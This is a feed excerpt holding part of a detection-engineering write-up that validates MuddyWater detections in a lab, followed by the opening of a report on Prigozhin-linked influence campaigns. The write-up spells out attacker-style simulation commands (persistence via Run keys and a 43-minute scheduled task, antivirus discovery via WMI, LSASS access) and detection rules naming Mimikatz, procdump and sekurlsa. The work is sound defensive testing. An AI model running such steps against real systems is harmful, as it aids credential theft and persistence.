— Registry Run Key Persistence</h4><p><strong>What MuddyWater does:</strong> Small Sieve writes OutlookMicrosift to HKCU\...\CurrentVersion\Run — a deliberate typo designed to look like a Microsoft entry. Canopy drops a .wsf file to the Startup folder.</p><p><strong>Rule A simulation:</strong> Write OutlookMicrosift = notepad.exe to HKCU\...\Run</p><p><strong>KQL — Rule A:</strong></p><pre>winlog.event_id: 13<br>AND winlog.event_data.TargetObject: *CurrentVersion\Run\OutlookMicrosift*</pre><p><strong>Rule A Result: PASS</strong> — 3 Sysmon EID 13 events. OutlookMicrosift Run key captured.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*RTAU8BoEU41ydMrali20PA.png"></figure><p><strong>Rule C simulation:</strong> Copy a benign .wsf file to %APPDATA%\...\Start Menu\Programs\Startup\</p><p><strong>KQL — Rule C:</strong></p><pre>winlog.event_id: 11<br>AND winlog.event_data.TargetFilename: *\Startup\*<br>AND winlog.event_data.TargetFilename: *.wsf*</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*C6VaYiU1W6t9P7VM9Uyq6Q.png"></figure><p><strong>Rule C Result: PASS</strong> — 3 Sysmon EID 11 events. WSF file creation in Startup folder captured.</p><h4>Step 26: det_mw_0006 — Scheduled Task (43-Minute Beacon)</h4><p><strong>What MuddyWater does:</strong> BugSleep creates a scheduled task triggered every <strong>43 minutes</strong>. This interval is a BugSleep artifact — not a default, not a round number. It appears in INCD 2024 reporting and is one of the most precise technical IoCs in the dataset.</p><p><strong>Simulation:</strong> schtasks.exe /create /tn DH-SIM-0006-TestTask /tr notepad.exe /sc MINUTE /mo 43 /f</p><p><strong>KQL:</strong></p><pre>winlog.event_id: 1<br>AND winlog.event_data.Image: *\schtasks.exe*<br>AND winlog.event_data.CommandLine: */mo 43*</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*8a6plhGCKeJFpgCePxizDA.png"></figure><p><strong>Result: PASS</strong> — 3 Sysmon EID 1 events. schtasks.exe /mo 43 captured. The 43-minute interval in the command line is the exact BugSleep artifact.</p><blockquote><strong><em>Hunt value:</em></strong><em> </em><em>PT43M in Task Scheduler Operational logs is a retroactive hunt trigger. One match = investigate immediately. No legitimate software uses this exact interval.</em></blockquote><h4>Step 27: det_mw_0007 — RMM Tool Abuse</h4><p><strong>What MuddyWater does:</strong> Delivers a legitimate RMM binary (ScreenConnect, SimpleHelp, AteraAgent, Level, PDQConnect) via phishing email or file-sharing link. The binary is placed in AppData, Temp, or Downloads — not installed by an IT management system. This is documented in all five government source tiers.</p><p><strong>Simulation:</strong> Copy ScreenConnect.ClientService.exe to C:\Temp\dh-lab\ and launch it.</p><p><strong>KQL:</strong></p><pre>winlog.event_id: 1<br>AND winlog.event_data.Image: *\Temp\ScreenConnect*</pre><p><strong>Result: PASS</strong> — 6 Sysmon EID 1 events. RMM binary executing from \Temp\ captured.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*U9wgP3tZtCZYaEGIct6woQ.png"></figure><blockquote><strong><em>Production requirement:</em></strong><em> This detection requires a baseline of authorized RMM deployments per endpoint. Without the baseline, it generates noise. With it, any out-of-baseline RMM execution is an immediate high-confidence alert.</em></blockquote><h4>Step 28: det_mw_0008a — Telegram Bot API C2</h4><p><strong>What MuddyWater does:</strong> Small Sieve uses the Telegram Bot API (api.telegram.org:443) for C2 over HTTPS. In an enterprise environment where Telegram is not standard software, any non-browser process connecting to this domain is anomalous.</p><p><strong>Simulation:</strong> powershell.exe makes an HTTP request to https://api.telegram.org/botTEST/getMe (invalid token — 401 response; the connection attempt is the evidence).</p><p><strong>Result: FAIL</strong> — Sysmon EID 3 (NetworkConnect) did not fire. Root cause: VirtualBox NAT prevents Sysmon from capturing the outbound network connection to api.telegram.org in the lab environment. The Sysmon rule config is correct. <strong>Resolution:</strong> Re-test with a host-only NIC that provides direct internet access.</p><h4>Step 29: det_mw_0008b — DNS Tunneling</h4><p><strong>What MuddyWater does:</strong> Mori uses DNS tunneling for C2. High-volume queries with long, high-entropy subdomain labels are the telemetry signature.</p><p><strong>Simulation:</strong> 60 Resolve-DnsName queries with 42-character random labels against *.test.internal.</p><p><strong>KQL:</strong></p><pre>winlog.event_id: 22<br>AND winlog.event_data.QueryName: *.test.internal*</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*yt5HdYyG3lGJi-pY88VPXA.png"></figure><p><strong>Result: PASS</strong> — 180 Sysmon EID 22 events captured. 42-character random labels visible in QueryName field. Volume threshold (Rule A) and label-length threshold (Rule B) would both trigger in a production deployment.</p><h4>Step 30: det_mw_0009 — WMI SecurityCenter2 Discovery</h4><p><strong>What MuddyWater does:</strong> CISA AA22–055A documents a post-access survey script that queries root\SecurityCenter2\AntiVirusProduct via WMI — enumerating the installed AV product before deciding how to proceed. This is also combined with OS info, network config, and user queries in a single script.</p><p><strong>Simulation (Rule A):</strong> Get-WmiObject -Namespace root/SecurityCenter2 -Class AntiVirusProduct</p><p><strong>KQL — Rule A:</strong></p><pre>winlog.event_id: 4104<br>AND winlog.event_data.ScriptBlockText: *SecurityCenter2*</pre><p><strong>Rule A Result: PASS</strong> — 21 PS EID 4104 events. SecurityCenter2 visible in decoded ScriptBlockText.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*wpLAuTyJkLgoqezMzJWISA.png"></figure><blockquote><strong><em>Detection value:</em></strong><em> SecurityCenter2 + AntiVirusProduct is one of the highest-specificity behavioral signals in this dataset. Its legitimate caller population is tiny: only AV management consoles and a few inventory tools query this namespace. A PowerShell process making this query outside those exceptions warrants immediate investigation.</em></blockquote><h4>Step 31: det_mw_0010 — LSASS Memory Access</h4><p><strong>What MuddyWater does:</strong> Uses Mimikatz, procdump64.exe, and LaZagne to dump LSASS memory and extract credentials. CISA AA22–055A names all three tools.</p><p><strong>Rule A simulation:</strong> .NET OpenProcess(PROCESS_QUERY_INFORMATION, lsass.pid) — opens a handle to lsass.exe with a minimal access mask, triggering Sysmon EID 10.</p><p><strong>KQL — Rule A:</strong></p><pre>winlog.event_id: 10<br>AND winlog.event_data.TargetImage: *lsass.exe*<br>AND winlog.event_data.GrantedAccess: 0x1400</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*G-oMtjgeEzuCIKfTDznKzA.png"></figure><p><strong>Rule A Result: PASS</strong> — 3,398 Sysmon EID 10 events with GrantedAccess: 0x1400 and TargetImage: lsass.exe. The high event count is expected — LSASS receives many legitimate handle requests from AV, EDR, and Windows system processes. Production deployment requires an allowlist of known-good callers.</p><p><strong>Rule C simulation:</strong> Write a 4-byte MDMP header as lsass_test.dmp to C:\Temp\dh-lab\ — triggers Sysmon EID 11.</p><p><strong>KQL — Rule C:</strong></p><pre>winlog.event_id: 11<br>AND winlog.event_data.TargetFilename: *.dmp*<br>AND winlog.event_data.TargetFilename: *Temp*</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*TrCWgKcujqKdBRCX-OG26w.png"></figure><p><strong>Rule C Result: PASS</strong> — 6 Sysmon EID 11 events. C:\Temp\dh-lab\lsass_test.dmp creation captured.</p><blockquote><strong><em>Lab safety:</em></strong><em> The </em><em>.dmp file was deleted immediately after event confirmation. No credential material exists in the file — it was a 4-byte header stub. No real LSASS dump was performed.</em></blockquote><h3>Phase 5 Validation Results Summary</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Yl6Y0h2_ePVKH3i8einFDQ.png"></figure><p>Full run: ansible-playbook playbooks/validate.yml — <strong>ok=70 changed=42 failed=0</strong></p><ul><li>Step 21 — <strong>det_mw_0001</strong> · Process spawn → <strong>PASS</strong></li><li>Step 22 — <strong>det_mw_0002</strong> · Shell from service → <strong>PASS</strong></li><li>Step 23 — <strong>det_mw_0003</strong> · Rule A (-e + Base64) → <strong>PASS</strong></li><li>Step 23 — <strong>det_mw_0003</strong> · Rule B (IEX + DownloadString) → <strong>PASS</strong></li><li>Step 24 — <strong>det_mw_0004</strong> · EID 7 ImageLoad → <strong>PARTIAL</strong></li><li>Step 25 — <strong>det_mw_0005</strong> · Rule A (OutlookMicrosift) → <strong>PASS</strong></li><li>Step 25 — <strong>det_mw_0005</strong> · Rule C (WSF in Startup) → <strong>PASS</strong></li><li>Step 26 — <strong>det_mw_0006</strong> · schtasks /mo 43 → <strong>PASS</strong></li><li>Step 27 — <strong>det_mw_0007</strong> · Rule A (RMM from \Temp) → <strong>PASS</strong></li><li>Step 27 — <strong>det_mw_0007</strong> · Rule B (RMM from PS parent) → <strong>PASS</strong></li><li>Step 28 — <strong>det_mw_0008a</strong> · EID 3 Telegram → <strong>FAIL</strong></li><li>Step 29 — <strong>det_mw_0008b</strong> · EID 22 DNS tunneling → <strong>PASS</strong></li><li>Step 30 — <strong>det_mw_0009</strong> · Rule A (SecurityCenter2 EID 4104) → <strong>PASS</strong></li><li>Step 30 — <strong>det_mw_0009</strong> · Rule B (wmic SecurityCenter2) → <strong>PASS</strong></li><li>Step 31 — <strong>det_mw_0010</strong> · Rule A (LSASS EID 10) → <strong>PASS</strong></li><li>Step 31 — <strong>det_mw_0010</strong> · Rule C (.dmp EID 11) → <strong>PASS</strong></li></ul><p><strong>13 PASS / 1 PARTIAL / 1 FAIL</strong> across 16 rule checks.</p><h3>Phase 6: Coverage Matrix</h3><p>Of 22 ATT&amp;CK techniques documented in the source set:</p><ul><li><strong>15 techniques (68%)</strong> — score 5, fully lab-validated</li><li><strong>2 techniques (9%)</strong> — score 4, correlated and validated via fallback</li><li><strong>4 techniques (18%)</strong> — score 3, rule present but validation incomplete</li><li><strong>7 techniques</strong> — score 0, no detection (Lateral Movement, Collection, Exfiltration, Impact)</li></ul><p><strong>The six capability gates</strong> that determine your effective coverage floor:</p><ul><li><strong>PowerShell Script Block Logging (EID 4104)</strong> — unlocks det_mw_0003 Rule B and det_mw_0009 Rules A/C. Without it: detection degrades to command-line heuristics only.</li><li><strong>Sysmon EID 10 (ProcessAccess)</strong> — unlocks det_mw_0010 Rule A (tool-agnostic LSASS access). Without it: falls back to binary name matching, misses custom dumpers.</li><li><strong>Sysmon EID 7 (ImageLoad)</strong> — unlocks det_mw_0004 (DLL side-loading). Without it: DLL loads are completely invisible.</li><li><strong>DNS resolver logging (full QNAME)</strong> — unlocks det_mw_0008b (DNS tunneling). Without it: Mori C2 channel is invisible.</li><li><strong>Network flow / proxy logs</strong> — unlocks det_mw_0007 Rule C and det_mw_0008a. Without it: RMM and Telegram C2 network-layer coverage lost.</li><li><strong>Email gateway telemetry (SEG)</strong> — unlocks det_mw_0001 full correlated logic. Without it: email-to-endpoint correlation unavailable.</li></ul><h3>What Defenders Should Do Right Now</h3><p><strong>1. Baseline your RMM deployments.</strong> det_mw_0007 is the most consistently documented MuddyWater technique across all five source tiers. It fires on ScreenConnect, SimpleHelp, AteraAgent, Level, and PDQConnect from non-standard paths. But it needs a baseline of authorized deployments first. Build the baseline; the detection logic is already written.</p><p><strong>2. Enable PowerShell Script Block Logging fleet-wide.</strong> One Group Policy change:</p><pre>Computer Configuration → Administrative Templates → Windows Components<br>→ Windows PowerShell → Turn on PowerShell Script Block Logging → Enabled</pre><p>This unlocks det_mw_0003 Rule B and all three det_mw_0009 rules. No other change required.</p><p><strong>3. Configure Sysmon ProcessAccess against lsass.exe.</strong> Without it, LSASS credential dumping detection is binary-name-only. Renamed Mimikatz and custom C++ dumpers are invisible. Add &lt;ProcessAccess onmatch="include"&gt; targeting lsass.exe to sysmon.xml.</p><p><strong>4. Hunt for PT43M now.</strong> Query your Task Scheduler Operational logs for any task with a RepetitionInterval of PT43M. If you find one you didn't create, that is BugSleep. No other legitimate software uses this interval.</p><h3>Reproduce It Yourself</h3><p>The entire project is on GitHub: <a href="https://github.com/anpa1200/operation-desert-hydra"><strong>github.com/anpa1200/operation-desert-hydra</strong></a></p><p>One repository contains everything: Docker Compose stack (OpenCTI + Elasticsearch + Kibana), Vagrant lab VM, Ansible provisioning playbooks, detection rules in four formats (Sigma, KQL, Elastic JSON, SPL), structured intelligence datasets (YAML), and all 12 proof screenshots.</p><p><strong>Deploy:</strong></p><pre>git clone https://github.com/anpa1200/operation-desert-hydra.git<br>cd operation-desert-hydra<br>cp stack/.env.template stack/.env<br># fill in ELASTIC_PASSWORD, OPENCTI_ADMIN_PASSWORD, OPENCTI_ADMIN_TOKEN<br>bash start.sh<br># → OpenCTI: http://localhost:8080<br># → Kibana:  http://localhost:5601<br># → all 11 simulations run automatically (~10 min)</pre><p><strong>Stop / destroy:</strong></p><pre>bash stop.sh                # halt VM, keep stack and data<br>bash stop.sh --destroy-vm   # remove VM disk<br>bash stop.sh --destroy-stack  # also stop Docker stack</pre><p><strong>Skip the lab VM</strong> (OpenCTI + Kibana only, no Windows VM):</p><pre>bash start.sh --skip-lab</pre><p>Prerequisites: Docker, VirtualBox, Vagrant, Ansible, Python 3 + pywinrm. Full details in the <a href="https://github.com/anpa1200/operation-desert-hydra/blob/main/README.md">README</a>.</p><p>Key files:</p><ul><li>docs/article-step-0-project-scenario.md — full phase-by-phase walkthrough</li><li>data/detections.yaml — all 11 detection records with coverage scores</li><li>lab/ansible/playbooks/validate.yml — the 11 simulation playbook</li><li>detections/sigma/, detections/kql/, detections/elastic/, detections/spl/ — rule exports</li></ul><h3>What This Project Is Not</h3><p>This is not a red team toolkit. The lab produces benign telemetry for detection validation — no live malware, no real C2, no credential theft. The detection pseudologic is SIEM-agnostic and requires production translation and tuning before deployment. Coverage scores are conservative: 5 requires a Kibana screenshot, not just passing logic.</p><p>The source base is entirely public. The actor’s actual TTPs may be more sophisticated than what is documented. Treat the coverage matrix as a floor, not a ceiling.</p><h3>Production Scars</h3><p>Everything above describes what the project looks like after it worked. This section documents what broke, in what order, and what was actually fixed — the kind of detail that gets cut from writeups but is the most useful part for anyone trying to reproduce this.</p><h4>Scar 1: The Simulations Were Faking It</h4><p>The first validation attempt used synthetic event markers. The simulation playbook injected a DH-SIM-0001 string into the CommandLine field, then the Kibana queries looked for that exact string:</p><pre>winlog.event_id: 1 AND winlog.event_data.CommandLine: *DH-SIM-0001*</pre><p>This produces a screenshot. It does not prove a detection works.</p><p>The problem is fundamental: a query that looks for a marker you injected proves that injection works, not that a detection fires on real attacker behavior. If MuddyWater runs wscript.exe and spawns powershell.exe -EncodedCommand, the DH-SIM-0001 query returns nothing. The detection coverage number was meaningless.</p><p><strong>What was fixed:</strong> All simulations were rewritten to produce realistic execution chains — wscript.exe spawning powershell.exe -EncodedCommand &lt;base64&gt;, schtasks.exe /create /sc minute /mo 43, lsass.exe being accessed by a test process with the correct GrantedAccess mask. All KQL queries were rewritten to use real field-based conditions: winlog.event_data.ParentImage, winlog.event_data.GrantedAccess, winlog.event_data.TargetObject, winlog.event_data.ScriptBlockText. Every proof screenshot now shows a real field value, not a synthetic marker.</p><p><strong>The lesson:</strong> A proof screenshot is only as good as the conditions that trigger it. If the simulation writes what the query reads, you have a tautology, not a detection.</p><h4>Scar 2: det_mw_0004 — The DLL That Wouldn’t Load</h4><p>The simulation for det_mw_0004 (DLL side-loading) created a 4-byte MZ-header stub file named Goopdate.dll in a temp directory alongside GoogleUpdate.exe, then waited for Sysmon Event ID 7 (ImageLoad) to fire.</p><p>It never fired.</p><p>Root cause: a 4-byte MZ stub is not a valid PE binary. The Windows loader parses the PE header before loading — the stub fails the loader’s structural validation and is rejected before the load event is generated. Sysmon only generates EID 7 for DLLs that actually get mapped into process memory. A file that fails to load produces no EID 7.</p><p>The Sysmon configuration was correct. The detection rule was correct. The simulation was wrong.</p><p><strong>Result: PARTIAL</strong> — coverage score 3 instead of 5.</p><p><strong>What it would take to fix:</strong> The test needs a real, valid DLL — even an empty DLL compiled from a single DllMain that returns TRUE. Alternatively, installing the actual Google Chrome on the lab VM provides a real Goopdate.dll at the expected path, which could then be copied to a non-standard location. Neither was done in this iteration due to lab scope constraints (no internet access on the VM for Chrome installation, no compiler toolchain in the lab).</p><p><strong>The lesson:</strong> When validating EID 7 detections, your test artifact must be a valid loadable PE. A stub file saves time and produces nothing.</p><h4>Scar 3: det_mw_0008a — VirtualBox NAT Ate the Telegram Traffic</h4><p>The simulation for det_mw_0008a (Telegram Bot API C2) made an outbound HTTPS connection to api.telegram.org from PowerShell and waited for Sysmon Event ID 3 (NetworkConnect) to fire.</p><p>It never fired.</p><p>Root cause: VirtualBox NAT performs network address translation at the hypervisor level. Sysmon captures network connections at the Windows kernel level. With NAT, the connection from the VM’s perspective terminates at the NAT gateway (10.0.2.2), not at api.telegram.org. Sysmon sees a connection to 10.0.2.2:443, not api.telegram.org:443. The detection rule looking for api.telegram.org as the destination found nothing.</p><p>There was an additional layer: VirtualBox NAT does not forward arbitrary outbound HTTPS traffic by default in this lab configuration — the VM had no direct internet path, only access to the host’s 10.0.2.2 gateway. Even fixing the Sysmon observation problem would require a working internet path from the VM.</p><p><strong>Result: FAIL</strong> — coverage score 3 instead of 5.</p><p><strong>What it would take to fix:</strong> Add a host-only or bridged network adapter to the VM that provides direct internet access, and confirm Sysmon captures the connection with the external destination. Alternatively, run a local HTTPS server on the host at api.telegram.org via a hosts file override, which would make the destination resolvable within the lab and catchable by Sysmon.</p><p><strong>The lesson:</strong> VirtualBox NAT is the right choice for lab isolation (the VM cannot reach the internet accidentally), but it is the wrong choice if you need to validate detections based on external destination hostnames. Design the network topology before writing detection validation cases.</p><h4>Scar 4: Kibana Showed Nothing — Wrong Time Window</h4><p>After running the SecurityCenter2 WMI discovery simulation (Step 30), the Kibana query returned zero results.</p><p>The query was correct. The simulation had run correctly. The events were in Elasticsearch.</p><p>Root cause: Kibana’s default time window was set to “Last 15 minutes.” The simulation had run in a previous lab session, and Winlogbeat had shipped the events to Elasticsearch during that session. The events existed — they were just outside the current time window.</p><p><strong>What was fixed:</strong> Changed the time filter to “Last 24 hours.” Events appeared immediately.</p><p><strong>The lesson:</strong> When a Kibana proof shows no results, the first diagnostic step is the time filter, not the query. This is obvious in retrospect and a consistent source of false “detection failed” conclusions during initial validation runs.</p><h4>Scar 5: Detection Design Bugs Found in Review (Before Validation)</h4><p>Before running any simulations, every detection record went through a structured review pass. Four real bugs were found:</p><p><strong>det_mw_0010 Rule B — Operator precedence error.</strong> The original pseudologic was:</p><pre>event_type = process_create AND<br>image IMATCHES "mimikatz\.exe" OR<br>image ENDSWITH "procdump64.exe" OR<br>command_line IMATCHES "(sekurlsa|lsadump|privilege::debug)"</pre><p>Without explicit parentheses, OR has lower precedence than AND in most query languages. The command_line IMATCHES clause was evaluated independently of the event_type guard, meaning the rule would fire on any event (not just process_create) where the command line contained sekurlsa. In a SIEM with millions of events per day, this generates noise and potentially masks the real signal. The fix added explicit brackets to keep all OR branches inside the event_type = process_create guard.</p><p><strong>det_mw_0009 Rule C — T1033 was not covered.</strong> The initial Rule C matched SecurityCenter2, Win32_NetworkAdapterConfiguration, and Win32_OperatingSystem — covering T1518.001, T1016, and T1082. The documented CISA script also collects the username via Win32_ComputerSystem. T1033 (System Owner/User Discovery) was missing. Fixed by adding Win32_ComputerSystem|Win32_UserAccount|UserName to the pattern match.</p><p><strong>det_mw_0004 Rule A — Missing x86 Google path.</strong> The initial allowlist only contained the x64 path C:\Program Files\Google\. On 64-bit Windows, the 32-bit Google Update installs to C:\Program Files (x86)\Google\. Without the x86 path in the allowlist, any Goopdate.dll load from the legitimate 32-bit Google installation would fire the detection. Added both paths.</p><p><strong>det_mw_0010 Rule A — Access mask set too narrow.</strong> The initial mask set covered standard Mimikatz masks (0x1010, 0x1410, 0x1438) but missed 0x1fffff (PROCESS_ALL_ACCESS, used by custom C++ dumpers and some loaders) and 0x1f0fff (another all-access variant observed in field reporting). A detection that only catches stock Mimikatz masks is bypassed by any custom implementation. Extended the mask set to cover known custom-dumper variants.</p><p><strong>The lesson:</strong> Writing pseudologic in a YAML field with no syntax validation means operator precedence bugs survive until someone reads the logic carefully. Structured peer review — ideally by someone who will try to break the rule — catches these before they hit production.</p><h4>Scar 6: The OpenCTI Stack Was in a Different Repository</h4><p>The original project structure had the OpenCTI Docker Compose stack in a separate repository (opencti-intelligent-shield) that was not included in the desert-hydra repo. The start.sh script referenced the external repo with a hardcoded path. Cloning operation-desert-hydra and running start.sh failed immediately on any machine other than the development machine.</p><p><strong>What was fixed:</strong> The entire stack — docker-compose.yml, docker-compose.kibana.yml, and .env.template — was copied into stack/ inside the desert-hydra repo. All path references were updated. The repo is now fully self-contained: git clone + cp .env.template .env + bash start.sh works from a clean machine with no external dependencies beyond Docker, Vagrant, VirtualBox, Ansible, and pywinrm.</p><p><strong>The lesson:</strong> A reproducibility claim requires everything needed to reproduce to be in the same repository. External path dependencies are invisible during development and obvious on first external clone.</p><h4>Scar 7: MITRE Connector Timing</h4><p>The import script (tools/opencti_import.py) creates MuddyWater → uses → ATT&amp;CK technique relationships by looking up techniques that the MITRE ATT&amp;CK connector has synced into OpenCTI. The connector takes several minutes to complete its initial sync of 846 techniques.</p><p>If the import script runs before the connector finishes, the technique lookup returns nothing — the techniques don’t exist yet. The original script failed silently on these lookups and skipped the relationship creation.</p><p><strong>What was fixed:</strong> The script was updated with find_or_create_attack_pattern(): if a technique is not yet in OpenCTI, create a stub AttackPattern object with the correct x_mitre_id. When the MITRE connector eventually syncs that technique, OpenCTI's deduplication logic merges the stub with the connector's fully populated object. All relationships that were created against the stub are preserved and now point to the enriched object. Running the script a second time after the connector finishes confirms existing objects rather than creating duplicates.</p><p><strong>The lesson:</strong> Any script that creates relationships against objects populated by a connector needs to handle the case where the connector has not finished. Fail loudly or create stubs — don’t skip silently.</p><h4>Surviving Gaps</h4><p>Two failures from Phase 5 remain open:</p><p><strong>det_mw_0004</strong> — DLL side-loading detection (EID 7) is not lab-validated. The detection rule is sound; the simulation needs a valid PE DLL. Coverage score stays at 3 until the lab is extended with a compiled test DLL.</p><p><strong>det_mw_0008a</strong> — Telegram Bot API connection detection (EID 3) is not lab-validated. The detection rule is sound; the lab network topology prevents capturing external destination hostnames via NAT. Coverage score stays at 3 until the VM has a direct internet path or a local HTTPS proxy target.</p><p>These are documented as open items, not dismissed as “out of scope.” The coverage score scale is designed to reflect this: a score of 3 means “behavioral detection, no lab proof” — it is honest about the gap rather than claiming coverage that was not validated.</p><p><strong>Seven ATT&amp;CK techniques have zero detection coverage.</strong> Lateral movement (T1021.001 RDP, T1550.002 Pass the Hash), Collection (T1005, T1039), Exfiltration (T1041), and Impact (T1486 ransomware, T1490 shadow copy deletion from DarkBit). These are acknowledged in the coverage matrix, not hidden. The actor uses them. The public source base documents them. The detection coverage does not exist in this iteration.</p><p><em>All code, data, and proof screenshots are version-controlled at </em><a href="https://github.com/anpa1200/operation-desert-hydra"><em>github.com/anpa1200/operation-desert-hydra</em></a></p><h3>Follow My Work</h3><p>I publish practical cybersecurity research, CTI workflows, detection engineering notes, malware analysis projects, OpenCTI work, cloud and Kubernetes security research, AI-assisted security tooling, labs, and technical guides.</p><ul><li><strong>Portfolio / Knowledge Base:</strong> <a href="https://anpa1200.github.io/">https://anpa1200.github.io/</a></li><li><strong>Medium:</strong> <a href="https://medium.com/@1200km">https://medium.com/@1200km</a></li><li><strong>GitHub:</strong> <a href="https://github.com/anpa1200">https://github.com/anpa1200</a></li><li><strong>LinkedIn:</strong> <a href="https://www.linkedin.com/in/andrey-pautov/">https://www.linkedin.com/in/andrey-pautov/</a></li></ul><h4><strong>Andrey Pautov</strong></h4><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=34da7917acf0" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/operation-desert-hydra-ai-assisted-cti-pipeline-muddywater-to-kibana-34da7917acf0">Operation Desert Hydra — AI-Assisted CTI Pipeline: MuddyWater to Kibana</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Life After Death? IO Campaigns Linked to Notorious Russian Businessman Prigozhin Persist After His Political Downfall and Death]]></title>
<description><![CDATA[Written by: Alden Wahlstrom, David Mainor, Daniel Kapellmann Zafra

 
In June 2023, Russian businessman Yevgeniy Prigozhin and his private military company (PMC) “Wagner” carried out an armed mutiny within Russia. The events triggered the meteoric political downfall of Prigozhin, raising question...]]></description>
<link>https://tsecurity.de/de/3578871/it-security-nachrichten/life-after-death-io-campaigns-linked-to-notorious-russian-businessman-prigozhin-persist-after-his-political-downfall-and-death/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3578871/it-security-nachrichten/life-after-death-io-campaigns-linked-to-notorious-russian-businessman-prigozhin-persist-after-his-political-downfall-and-death/</guid>
<pubDate>Sun, 07 Jun 2026 08:22:21 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="block-paragraph_advanced"><p>Written by: Alden Wahlstrom, David Mainor, Daniel Kapellmann Zafra</p>
<hr>
<p> </p></div>
<div class="block-paragraph_advanced"><p>In June 2023, Russian businessman Yevgeniy Prigozhin and his private military company (PMC) “Wagner” carried out an armed mutiny within Russia. The events triggered the meteoric political downfall of Prigozhin, raising questions about the future of his various enterprises that were only underscored when he died two months later under <a href="https://thehill.com/policy/international/4374263-putin-confidant-patrushev-plan-kill-prigozhin/" rel="noopener" target="_blank"><u>suspicious circumstances</u></a>. Up to that point, Prigozhin and his enterprises worked to advance the Kremlin’s interests as the manifestation of the thinnest veil of plausible deniability for state-guided actions on multiple continents. Such enterprises included the Wagner PMC; overt influence infrastructure, like his media company Patriot Group that housed his media companies, including the “RIA FAN” Federal News Agency; covert influence infrastructures; and an array of <a href="https://home.treasury.gov/news/press-releases/jy1581" rel="noopener" target="_blank"><u>businesses aimed</u></a> at generating personal wealth and the resourcing necessary to fund his various ventures.</p>
<p>Mandiant has for years tracked and reported on covert information operations (IO) threat activity linked to Prigozhin. His involvement in IO was first widely established in the West as part of the <a href="https://home.treasury.gov/news/press-releases/jy0126" rel="noopener" target="_blank"><u>public exposure</u></a> of Russian-backed interference in the 2016 U.S. presidential election—this included activity conducted by Russia’s Internet Research Agency (IRA), which the U.S. Government <a href="https://home.treasury.gov/news/press-releases/jy0126" rel="noopener" target="_blank"><u>publicly named</u></a> Prigozhin as its financier. Subsequently, Prigozhin was publicly connected to a web of IO activity targeting the U.S., EU, Ukraine, Russian domestic audiences, countries across Africa, and further afield. Such activity has worked not only to advance Russian interests on matters of strategic importance, but also has attempted to exploit existing divisions in societies targeting various subgroups across their population. </p>
<p>Throughout 2023, Mandiant has observed shifts in the activity from multiple IO campaigns linked to Prigozhin, including continued indicators that components of these campaigns have remained viable since his death. This blog post examines a sample of Prigozhin-linked IO campaigns to better understand their outcomes thus far and provide an overview of what can be expected from these activity sets in the future. This is relevant not only because some of the infrastructure of these campaigns remains viable despite Prigozhin’s undoing, but also because we advance into a year in which Ukraine continues to dominate Russia’s strategic priorities and there are multiple global elections that Russia may seek to influence.</p>
<p>Mandiant and Google's Threat Analysis Group (TAG) work together in support of our respective missions at Google. TAG <a href="https://blog.google/threat-analysis-group/ukraine-remains-russias-biggest-cyber-focus-in-2023/" rel="noopener" target="_blank">has likewise been tracking </a>coordinated influence operations <a href="https://blog.google/threat-analysis-group/prigozhin-interests-and-russian-information-operations/" rel="noopener" target="_blank">linked to Prigozhin</a> and the Internet Research Agency (IRA) for years; and in 2023, Google took over 400 enforcement actions to disrupt IO campaigns linked to the IRA, details of which are reported in the quarterly <a href="https://blog.google/threat-analysis-group/tag-bulletin-q3-2023/" rel="noopener" target="_blank">TAG Bulletin</a>. TAG has not observed significant activity from the IRA or other Prigozhin-linked entities specifically on Google platforms since Prigozhin's death, which is in line with Mandiant’s findings that have tracked different aspects of this broader set of threat activity.</p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/life-after-death-prigozhin-fig1.max-1000x1000.png" alt="Image of Prigozhin delivering an address at the Cyber Front Z headquarters in Saint Petersburg, Russia following a bombing that occurred there in April 2023">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="muos3">Figure 1: Image of Prigozhin delivering an address at the Cyber Front Z headquarters in Saint Petersburg, Russia following a bombing that occurred there in April 2023</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h2>Prigozhin-linked IO Infrastructure Persists Post-Death</h2>
<p>Mandiant closely tracks multiple IO campaigns that have variously been linked to Prigozhin, and we have observed shifts in these activity sets over the course of 2023, some of which likely were precipitated by Prigozhin’s political downfall and death. We have observed uneven degrees of change between campaigns, which may suggest variances in their original proximity to Prigozhin’s core operations or other campaign differences, such as management models or targeting focus, that have somehow influenced their respective degrees of continued viability thus far. However, we lack the visibility to assess the reason for this.</p>
<p>At least some components of these campaigns’ assets and infrastructure have remained viable since Prigozhin’s death, and we assess with moderate confidence that they will remain operational for the medium-term. These components will likely be leveraged by either their original, or appropriating operators, to influence public opinion on issues including those related to the Russian invasion of Ukraine, U.S. elections and politics, and developments in Africa’s Sahel region. </p>
<ul>
<li>We conducted an analytical review of three significant Prigozhin-linked IO campaigns that we track: the "Newsroom for American and European Based Citizens" (NAEBC) Campaign, Cyber Front Z, and a campaign linked to the Togo-based <em>Groupe Panafricain pour le Commerce et l'Investissement</em> (GPCI). 
<ul>
<li>The campaigns’ targeting aligns with core geographical regions known to be targeted by Prigozhin-linked IO: the U.S., Europe, Ukraine, Russia, and countries in Africa. </li>
</ul>
</li>
